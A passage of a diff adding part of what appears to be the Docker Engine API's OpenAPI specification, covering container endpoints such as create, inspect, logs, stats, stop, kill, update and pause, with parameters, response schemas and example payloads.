+                NetworkSettings:
+                  Networks:
+                    bridge:
+                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
+                      EndpointID: "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f"
+                      Gateway: "172.17.0.1"
+                      IPAddress: "172.17.0.2"
+                      IPPrefixLen: 16
+                      IPv6Gateway: ""
+                      GlobalIPv6Address: ""
+                      GlobalIPv6PrefixLen: 0
+                      MacAddress: "02:42:ac:11:00:02"
+                Mounts:
+                  - Name: "fac362...80535"
+                    Source: "/data"
+                    Destination: "/data"
+                    Driver: "local"
+                    Mode: "ro,Z"
+                    RW: false
+                    Propagation: ""
+              - Id: "9cd87474be90"
+                Names:
+                  - "/coolName"
+                Image: "ubuntu:latest"
+                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
+                Command: "echo 222222"
+                Created: 1367854155
+                State: "Exited"
+                Status: "Exit 0"
+                Ports: []
+                Labels: {}
+                SizeRw: 12288
+                SizeRootFs: 0
+                HostConfig:
+                  NetworkMode: "default"
+                NetworkSettings:
+                  Networks:
+                    bridge:
+                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
+                      EndpointID: "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a"
+                      Gateway: "172.17.0.1"
+                      IPAddress: "172.17.0.8"
+                      IPPrefixLen: 16
+                      IPv6Gateway: ""
+                      GlobalIPv6Address: ""
+                      GlobalIPv6PrefixLen: 0
+                      MacAddress: "02:42:ac:11:00:08"
+                Mounts: []
+              - Id: "3176a2479c92"
+                Names:
+                  - "/sleepy_dog"
+                Image: "ubuntu:latest"
+                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
+                Command: "echo 3333333333333333"
+                Created: 1367854154
+                State: "Exited"
+                Status: "Exit 0"
+                Ports: []
+                Labels: {}
+                SizeRw: 12288
+                SizeRootFs: 0
+                HostConfig:
+                  NetworkMode: "default"
+                NetworkSettings:
+                  Networks:
+                    bridge:
+                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
+                      EndpointID: "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d"
+                      Gateway: "172.17.0.1"
+                      IPAddress: "172.17.0.6"
+                      IPPrefixLen: 16
+                      IPv6Gateway: ""
+                      GlobalIPv6Address: ""
+                      GlobalIPv6PrefixLen: 0
+                      MacAddress: "02:42:ac:11:00:06"
+                Mounts: []
+              - Id: "4cb07b47f9fb"
+                Names:
+                  - "/running_cat"
+                Image: "ubuntu:latest"
+                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
+                Command: "echo 444444444444444444444444444444444"
+                Created: 1367854152
+                State: "Exited"
+                Status: "Exit 0"
+                Ports: []
+                Labels: {}
+                SizeRw: 12288
+                SizeRootFs: 0
+                HostConfig:
+                  NetworkMode: "default"
+                NetworkSettings:
+                  Networks:
+                    bridge:
+                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
+                      EndpointID: "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9"
+                      Gateway: "172.17.0.1"
+                      IPAddress: "172.17.0.5"
+                      IPPrefixLen: 16
+                      IPv6Gateway: ""
+                      GlobalIPv6Address: ""
+                      GlobalIPv6PrefixLen: 0
+                      MacAddress: "02:42:ac:11:00:05"
+                Mounts: []
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Container"]
+  /containers/create:
+    post:
+      summary: "Create a container"
+      operationId: "ContainerCreate"
+      consumes:
+        - "application/json"
+        - "application/octet-stream"
+      produces:
+        - "application/json"
+      parameters:
+        - name: "name"
+          in: "query"
+          description: "Assign the specified name to the container. Must match `/?[a-zA-Z0-9_-]+`."
+          type: "string"
+          pattern: "/?[a-zA-Z0-9_-]+"
+        - name: "body"
+          in: "body"
+          description: "Container to create"
+          schema:
+            allOf:
+              - $ref: "#/definitions/Config"
+              - type: "object"
+                properties:
+                  HostConfig:
+                    $ref: "#/definitions/HostConfig"
+                  NetworkingConfig:
+                    description: "This container's networking configuration."
+                    type: "object"
+                    properties:
+                      EndpointsConfig:
+                        description: "A mapping of network name to endpoint configuration for that network."
+                        type: "object"
+                        additionalProperties:
+                          $ref: "#/definitions/EndpointSettings"
+            example:
+              Hostname: ""
+              Domainname: ""
+              User: ""
+              AttachStdin: false
+              AttachStdout: true
+              AttachStderr: true
+              Tty: false
+              OpenStdin: false
+              StdinOnce: false
+              Env:
+                - "FOO=bar"
+                - "BAZ=quux"
+              Cmd:
+                - "date"
+              Entrypoint: ""
+              Image: "ubuntu"
+              Labels:
+                com.example.vendor: "Acme"
+                com.example.license: "GPL"
+                com.example.version: "1.0"
+              Volumes:
+                /volumes/data: {}
+              WorkingDir: ""
+              NetworkDisabled: false
+              MacAddress: "12:34:56:78:9a:bc"
+              ExposedPorts:
+                22/tcp: {}
+              StopSignal: "SIGTERM"
+              StopTimeout: 10
+              HostConfig:
+                Binds:
+                  - "/tmp:/tmp"
+                Links:
+                  - "redis3:redis"
+                Memory: 0
+                MemorySwap: 0
+                MemoryReservation: 0
+                KernelMemory: 0
+                NanoCPUs: 500000
+                CpuPercent: 80
+                CpuShares: 512
+                CpuPeriod: 100000
+                CpuRealtimePeriod: 1000000
+                CpuRealtimeRuntime: 10000
+                CpuQuota: 50000
+                CpusetCpus: "0,1"
+                CpusetMems: "0,1"
+                MaximumIOps: 0
+                MaximumIOBps: 0
+                BlkioWeight: 300
+                BlkioWeightDevice:
+                  - {}
+                BlkioDeviceReadBps:
+                  - {}
+                BlkioDeviceReadIOps:
+                  - {}
+                BlkioDeviceWriteBps:
+                  - {}
+                BlkioDeviceWriteIOps:
+                  - {}
+                MemorySwappiness: 60
+                OomKillDisable: false
+                OomScoreAdj: 500
+                PidMode: ""
+                PidsLimit: -1
+                PortBindings:
+                  22/tcp:
+                    - HostPort: "11022"
+                PublishAllPorts: false
+                Privileged: false
+                ReadonlyRootfs: false
+                Dns:
+                  - "8.8.8.8"
+                DnsOptions:
+                  - ""
+                DnsSearch:
+                  - ""
+                VolumesFrom:
+                  - "parent"
+                  - "other:ro"
+                CapAdd:
+                  - "NET_ADMIN"
+                CapDrop:
+                  - "MKNOD"
+                GroupAdd:
+                  - "newgroup"
+                RestartPolicy:
+                  Name: ""
+                  MaximumRetryCount: 0
+                AutoRemove: true
+                NetworkMode: "bridge"
+                Devices: []
+                Ulimits:
+                  - {}
+                LogConfig:
+                  Type: "json-file"
+                  Config: {}
+                SecurityOpt: []
+                StorageOpt: {}
+                CgroupParent: ""
+                VolumeDriver: ""
+                ShmSize: 67108864
+              NetworkingConfig:
+                EndpointsConfig:
+                  isolated_nw:
+                    IPAMConfig:
+                      IPv4Address: "172.20.30.33"
+                      IPv6Address: "2001:db8:abcd::3033"
+                      LinkLocalIPs:
+                        - "169.254.34.68"
+                        - "fe80::3468"
+                    Links:
+                      - "container_1"
+                      - "container_2"
+                    Aliases:
+                      - "server_x"
+                      - "server_y"
+
+          required: true
+      responses:
+        201:
+          description: "Container created successfully"
+          schema:
+            type: "object"
+            required: [Id, Warnings]
+            properties:
+              Id:
+                description: "The ID of the created container"
+                type: "string"
+                x-nullable: false
+              Warnings:
+                description: "Warnings encountered when creating the container"
+                type: "array"
+                x-nullable: false
+                items:
+                  type: "string"
+          examples:
+            application/json:
+              Id: "e90e34656806"
+              Warnings: []
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        406:
+          description: "impossible to attach"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        409:
+          description: "conflict"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Container"]
+  /containers/{id}/json:
+    get:
+      summary: "Inspect a container"
+      description: "Return low-level information about a container."
+      operationId: "ContainerInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "object"
+            properties:
+              Id:
+                description: "The ID of the container"
+                type: "string"
+              Created:
+                description: "The time the container was created"
+                type: "string"
+              Path:
+                description: "The path to the command being run"
+                type: "string"
+              Args:
+                description: "The arguments to the command being run"
+                type: "array"
+                items:
+                  type: "string"
+              State:
+                description: "The state of the container."
+                type: "object"
+                properties:
+                  Status:
+                    description: "The status of the container. For example, `running` or `exited`."
+                    type: "string"
+                  Running:
+                    description: "Whether this container is running."
+                    type: "boolean"
+                  Paused:
+                    description: "Whether this container is paused."
+                    type: "boolean"
+                  Restarting:
+                    description: "Whether this container is restarting."
+                    type: "boolean"
+                  OOMKilled:
+                    description: "Whether this container has been killed because it ran out of memory."
+                    type: "boolean"
+                  Dead:
+                    type: "boolean"
+                  Pid:
+                    description: "The process ID of this container"
+                    type: "integer"
+                  ExitCode:
+                    description: "The last exit code of this container"
+                    type: "integer"
+                  Error:
+                    type: "string"
+                  StartedAt:
+                    description: "The time when this container was last started."
+                    type: "string"
+                  FinishedAt:
+                    description: "The time when this container last exited."
+                    type: "string"
+              Image:
+                description: "The container's image"
+                type: "string"
+              ResolvConfPath:
+                type: "string"
+              HostnamePath:
+                type: "string"
+              HostsPath:
+                type: "string"
+              LogPath:
+                type: "string"
+              Node:
+                description: "TODO"
+                type: "object"
+              Name:
+                type: "string"
+              RestartCount:
+                type: "integer"
+              Driver:
+                type: "string"
+              MountLabel:
+                type: "string"
+              ProcessLabel:
+                type: "string"
+              AppArmorProfile:
+                type: "string"
+              ExecIDs:
+                type: "string"
+              HostConfig:
+                $ref: "#/definitions/HostConfig"
+              GraphDriver:
+                $ref: "#/definitions/GraphDriver"
+              SizeRw:
+                description: "The size of files that have been created or changed by this container."
+                type: "integer"
+                format: "int64"
+              SizeRootFs:
+                description: "The total size of all the files in this container."
+                type: "integer"
+                format: "int64"
+              Mounts:
+                type: "array"
+                items:
+                  $ref: "#/definitions/MountPoint"
+              Config:
+                $ref: "#/definitions/Config"
+              NetworkSettings:
+                $ref: "#/definitions/NetworkConfig"
+          examples:
+            application/json:
+              AppArmorProfile: ""
+              Args:
+                - "-c"
+                - "exit 9"
+              Config:
+                AttachStderr: true
+                AttachStdin: false
+                AttachStdout: true
+                Cmd:
+                  - "/bin/sh"
+                  - "-c"
+                  - "exit 9"
+                Domainname: ""
+                Env:
+                  - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+                Hostname: "ba033ac44011"
+                Image: "ubuntu"
+                Labels:
+                  com.example.vendor: "Acme"
+                  com.example.license: "GPL"
+                  com.example.version: "1.0"
+                MacAddress: ""
+                NetworkDisabled: false
+                OpenStdin: false
+                StdinOnce: false
+                Tty: false
+                User: ""
+                Volumes:
+                  /volumes/data: {}
+                WorkingDir: ""
+                StopSignal: "SIGTERM"
+                StopTimeout: 10
+              Created: "2015-01-06T15:47:31.485331387Z"
+              Driver: "devicemapper"
+              HostConfig:
+                MaximumIOps: 0
+                MaximumIOBps: 0
+                BlkioWeight: 0
+                BlkioWeightDevice:
+                  - {}
+                BlkioDeviceReadBps:
+                  - {}
+                BlkioDeviceWriteBps:
+                  - {}
+                BlkioDeviceReadIOps:
+                  - {}
+                BlkioDeviceWriteIOps:
+                  - {}
+                ContainerIDFile: ""
+                CpusetCpus: ""
+                CpusetMems: ""
+                CpuPercent: 80
+                CpuShares: 0
+                CpuPeriod: 100000
+                CpuRealtimePeriod: 1000000
+                CpuRealtimeRuntime: 10000
+                Devices: []
+                IpcMode: ""
+                LxcConf: []
+                Memory: 0
+                MemorySwap: 0
+                MemoryReservation: 0
+                KernelMemory: 0
+                OomKillDisable: false
+                OomScoreAdj: 500
+                NetworkMode: "bridge"
+                PidMode: ""
+                PortBindings: {}
+                Privileged: false
+                ReadonlyRootfs: false
+                PublishAllPorts: false
+                RestartPolicy:
+                  MaximumRetryCount: 2
+                  Name: "on-failure"
+                LogConfig:
+                  Type: "json-file"
+                Sysctls:
+                  net.ipv4.ip_forward: "1"
+                Ulimits:
+                  - {}
+                VolumeDriver: ""
+                ShmSize: 67108864
+              HostnamePath: "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname"
+              HostsPath: "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts"
+              LogPath: "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log"
+              Id: "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39"
+              Image: "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2"
+              MountLabel: ""
+              Name: "/boring_euclid"
+              NetworkSettings:
+                Bridge: ""
+                SandboxID: ""
+                HairpinMode: false
+                LinkLocalIPv6Address: ""
+                LinkLocalIPv6PrefixLen: 0
+                SandboxKey: ""
+                SecondaryIPAddresses: null
+                SecondaryIPv6Addresses: null
+                EndpointID: ""
+                Gateway: ""
+                GlobalIPv6Address: ""
+                GlobalIPv6PrefixLen: 0
+                IPAddress: ""
+                IPPrefixLen: 0
+                IPv6Gateway: ""
+                MacAddress: ""
+                Networks:
+                  bridge:
+                    NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
+                    EndpointID: "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d"
+                    Gateway: "172.17.0.1"
+                    IPAddress: "172.17.0.2"
+                    IPPrefixLen: 16
+                    IPv6Gateway: ""
+                    GlobalIPv6Address: ""
+                    GlobalIPv6PrefixLen: 0
+                    MacAddress: "02:42:ac:12:00:02"
+              Path: "/bin/sh"
+              ProcessLabel: ""
+              ResolvConfPath: "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf"
+              RestartCount: 1
+              State:
+                Error: ""
+                ExitCode: 9
+                FinishedAt: "2015-01-06T15:47:32.080254511Z"
+                OOMKilled: false
+                Dead: false
+                Paused: false
+                Pid: 0
+                Restarting: false
+                Running: true
+                StartedAt: "2015-01-06T15:47:32.072697474Z"
+                Status: "running"
+              Mounts:
+                - Name: "fac362...80535"
+                  Source: "/data"
+                  Destination: "/data"
+                  Driver: "local"
+                  Mode: "ro,Z"
+                  RW: false
+                  Propagation: ""
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "size"
+          in: "query"
+          type: "boolean"
+          default: false
+          description: "Return the size of container as fields `SizeRw` and `SizeRootFs`"
+      tags: ["Container"]
+  /containers/{id}/top:
+    get:
+      summary: "List processes running inside a container"
+      description: "On Unix systems, this is done by running the `ps` command. This endpoint is not supported on Windows."
+      operationId: "ContainerTop"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "object"
+            properties:
+              Titles:
+                description: "The ps column titles"
+                type: "array"
+                items:
+                  type: "string"
+              Processes:
+                description: "Each process running in the container, where each is process is an array of values corresponding to the titles"
+                type: "array"
+                items:
+                  type: "array"
+                  items:
+                    type: "string"
+          examples:
+            application/json:
+              Titles:
+                - "UID"
+                - "PID"
+                - "PPID"
+                - "C"
+                - "STIME"
+                - "TTY"
+                - "TIME"
+                - "CMD"
+              Processes:
+                -
+                  - "root"
+                  - "13642"
+                  - "882"
+                  - "0"
+                  - "17:03"
+                  - "pts/0"
+                  - "00:00:00"
+                  - "/bin/bash"
+                -
+                  - "root"
+                  - "13735"
+                  - "13642"
+                  - "0"
+                  - "17:06"
+                  - "pts/0"
+                  - "00:00:00"
+                  - "sleep 10"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "ps_args"
+          in: "query"
+          description: "The arguments to pass to `ps`. For example, `aux`"
+          type: "string"
+          default: "-ef"
+      tags: ["Container"]
+  /containers/{id}/logs:
+    get:
+      summary: "Get container logs"
+      description: |
+        Get `stdout` and `stderr` logs from a container.
+
+        Note: This endpoint works only for containers with the `json-file` or `journald` logging driver.
+      operationId: "ContainerLogs"
+      responses:
+        101:
+          description: "logs returned as a stream"
+          schema:
+            type: "string"
+            format: "binary"
+        200:
+          description: "logs returned as a string in response body"
+          schema:
+            type: "string"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "follow"
+          in: "query"
+          description: |
+            Return the logs as a stream.
+
+            This will return a `101` HTTP response with a `Connection: upgrade` header, then hijack the HTTP connection to send raw output. For more information about hijacking and the stream format, [see the documentation for the attach endpoint](#operation/ContainerAttach).
+          type: "boolean"
+          default: false
+        - name: "stdout"
+          in: "query"
+          description: "Return logs from `stdout`"
+          type: "boolean"
+          default: false
+        - name: "stderr"
+          in: "query"
+          description: "Return logs from `stderr`"
+          type: "boolean"
+          default: false
+        - name: "since"
+          in: "query"
+          description: "Only return logs since this time, as a UNIX timestamp"
+          type: "integer"
+          default: 0
+        - name: "timestamps"
+          in: "query"
+          description: "Add timestamps to every log line"
+          type: "boolean"
+          default: false
+        - name: "tail"
+          in: "query"
+          description: "Only return this number of log lines from the end of the logs. Specify as an integer or `all` to output all log lines."
+          type: "string"
+          default: "all"
+      tags: ["Container"]
+  /containers/{id}/changes:
+    get:
+      summary: "Get changes on a container’s filesystem"
+      description: |
+        Returns which files in a container's filesystem have been added, deleted, or modified. The `Kind` of modification can be one of:
+
+        - `0`: Modified
+        - `1`: Added
+        - `2`: Deleted
+      operationId: "ContainerChanges"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "array"
+            items:
+              type: "object"
+              properties:
+                Path:
+                  description: "Path to file that has changed"
+                  type: "string"
+                Kind:
+                  description: "Kind of change"
+                  type: "integer"
+                  enum:
+                    - 0
+                    - 1
+                    - 2
+          examples:
+            application/json:
+              - Path: "/dev"
+                Kind: 0
+              - Path: "/dev/kmsg"
+                Kind: 1
+              - Path: "/test"
+                Kind: 1
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+      tags: ["Container"]
+  /containers/{id}/export:
+    get:
+      summary: "Export a container"
+      description: "Export the contents of a container as a tarball."
+      operationId: "ContainerExport"
+      produces:
+        - "application/octet-stream"
+      responses:
+        200:
+          description: "no error"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+      tags: ["Container"]
+  /containers/{id}/stats:
+    get:
+      summary: "Get container stats based on resource usage"
+      description: |
+        This endpoint returns a live stream of a container’s resource usage statistics.
+
+        The `precpu_stats` is the CPU statistic of last read, which is used for calculating the CPU usage percentage. It is not the same as the `cpu_stats` field.
+      operationId: "ContainerStats"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "object"
+          examples:
+            application/json:
+              read: "2015-01-08T22:57:31.547920715Z"
+              pids_stats:
+                current: 3
+              networks:
+                eth0:
+                  rx_bytes: 5338
+                  rx_dropped: 0
+                  rx_errors: 0
+                  rx_packets: 36
+                  tx_bytes: 648
+                  tx_dropped: 0
+                  tx_errors: 0
+                  tx_packets: 8
+                eth5:
+                  rx_bytes: 4641
+                  rx_dropped: 0
+                  rx_errors: 0
+                  rx_packets: 26
+                  tx_bytes: 690
+                  tx_dropped: 0
+                  tx_errors: 0
+                  tx_packets: 9
+              memory_stats:
+                stats:
+                  total_pgmajfault: 0
+                  cache: 0
+                  mapped_file: 0
+                  total_inactive_file: 0
+                  pgpgout: 414
+                  rss: 6537216
+                  total_mapped_file: 0
+                  writeback: 0
+                  unevictable: 0
+                  pgpgin: 477
+                  total_unevictable: 0
+                  pgmajfault: 0
+                  total_rss: 6537216
+                  total_rss_huge: 6291456
+                  total_writeback: 0
+                  total_inactive_anon: 0
+                  rss_huge: 6291456
+                  hierarchical_memory_limit: 67108864
+                  total_pgfault: 964
+                  total_active_file: 0
+                  active_anon: 6537216
+                  total_active_anon: 6537216
+                  total_pgpgout: 414
+                  total_cache: 0
+                  inactive_anon: 0
+                  active_file: 0
+                  pgfault: 964
+                  inactive_file: 0
+                  total_pgpgin: 477
+                max_usage: 6651904
+                usage: 6537216
+                failcnt: 0
+                limit: 67108864
+              blkio_stats: {}
+              cpu_stats:
+                cpu_usage:
+                  percpu_usage:
+                    - 8646879
+                    - 24472255
+                    - 36438778
+                    - 30657443
+                  usage_in_usermode: 50000000
+                  total_usage: 100215355
+                  usage_in_kernelmode: 30000000
+                system_cpu_usage: 739306590000000
+                throttling_data:
+                  periods: 0
+                  throttled_periods: 0
+                  throttled_time: 0
+              precpu_stats:
+                cpu_usage:
+                  percpu_usage:
+                    - 8646879
+                    - 24350896
+                    - 36438778
+                    - 30657443
+                  usage_in_usermode: 50000000
+                  total_usage: 100093996
+                  usage_in_kernelmode: 30000000
+                system_cpu_usage: 9492140000000
+                throttling_data:
+                  periods: 0
+                  throttled_periods: 0
+                  throttled_time: 0
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "stream"
+          in: "query"
+          description: "Stream the output. If false, the stats will be output once and then it will disconnect."
+          type: "boolean"
+          default: true
+      tags: ["Container"]
+  /containers/{id}/resize:
+    post:
+      summary: "Resize a container TTY"
+      description: "Resize the TTY for a container. You must restart the container for the resize to take effect."
+      operationId: "ContainerResize"
+      consumes:
+        - "application/octet-stream"
+      produces:
+        - "text/plain"
+      responses:
+        200:
+          description: "no error"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "cannot resize container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "h"
+          in: "query"
+          description: "Height of the tty session in characters"
+          type: "integer"
+        - name: "w"
+          in: "query"
+          description: "Width of the tty session in characters"
+          type: "integer"
+      tags: ["Container"]
+  /containers/{id}/start:
+    post:
+      summary: "Start a container"
+      operationId: "ContainerStart"
+      responses:
+        204:
+          description: "no error"
+        304:
+          description: "container already started"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "detachKeys"
+          in: "query"
+          description: "Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`."
+          type: "string"
+      tags: ["Container"]
+  /containers/{id}/stop:
+    post:
+      summary: "Stop a container"
+      operationId: "ContainerStop"
+      responses:
+        204:
+          description: "no error"
+        304:
+          description: "container already stopped"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "t"
+          in: "query"
+          description: "Number of seconds to wait before killing the container"
+          type: "integer"
+      tags: ["Container"]
+  /containers/{id}/restart:
+    post:
+      summary: "Restart a container"
+      operationId: "ContainerRestart"
+      responses:
+        204:
+          description: "no error"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "t"
+          in: "query"
+          description: "Number of seconds to wait before killing the container"
+          type: "integer"
+      tags: ["Container"]
+  /containers/{id}/kill:
+    post:
+      summary: "Kill a container"
+      description: "Send a POSIX signal to a container, defaulting to killing to the container."
+      operationId: "ContainerKill"
+      responses:
+        204:
+          description: "no error"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "signal"
+          in: "query"
+          description: "Signal to send to the container as an integer or string (e.g. `SIGINT`)"
+          type: "string"
+          default: "SIGKILL"
+      tags: ["Container"]
+  /containers/{id}/update:
+    post:
+      summary: "Update a container"
+      description: "Change various configuration options of a container without having to recreate it."
+      operationId: "ContainerUpdate"
+      consumes: ["application/json"]
+      produces: ["application/json"]
+      responses:
+        200:
+          description: "The container has been updated."
+          schema:
+            type: "object"
+            properties:
+              Warnings:
+                type: "array"
+                items:
+                  type: "string"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "update"
+          in: "body"
+          required: true
+          schema:
+            allOf:
+              - $ref: "#/definitions/Resources"
+              - type: "object"
+                properties:
+                  RestartPolicy:
+                    $ref: "#/definitions/RestartPolicy"
+            example:
+              BlkioWeight: 300
+              CpuShares: 512
+              CpuPeriod: 100000
+              CpuQuota: 50000
+              CpuRealtimePeriod: 1000000
+              CpuRealtimeRuntime: 10000
+              CpusetCpus: "0,1"
+              CpusetMems: "0"
+              Memory: 314572800
+              MemorySwap: 514288000
+              MemoryReservation: 209715200
+              KernelMemory: 52428800
+              RestartPolicy:
+                MaximumRetryCount: 4
+                Name: "on-failure"
+      tags: ["Container"]
+  /containers/{id}/rename:
+    post:
+      summary: "Rename a container"
+      operationId: "ContainerRename"
+      responses:
+        204:
+          description: "no error"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        409:
+          description: "name already in use"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+        - name: "name"
+          in: "query"
+          required: true
+          description: "New name for the container"
+          type: "string"
+      tags: ["Container"]
+  /containers/{id}/pause:
+    post:
+      summary: "Pause a container"
+      description: |
+        Use the cgroups freezer to suspend all processes in a container.
+
+        Traditionally, when suspending a process the `SIGSTOP` signal is used, which is observable by the process being suspended. With the cgroups freezer the process is unaware, and unable to capture, that it is being suspended, and subsequently resumed.
+      operationId: "ContainerPause"
+      responses:
+        204:
+          description: "no error"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID or name of the container"
+          type: "string"
+      tags: ["Container"]
+  /containers/{id}/unpause:
+    post:
+      summary: "Unpause a container"
+      description: "Resume a container which has been paused."
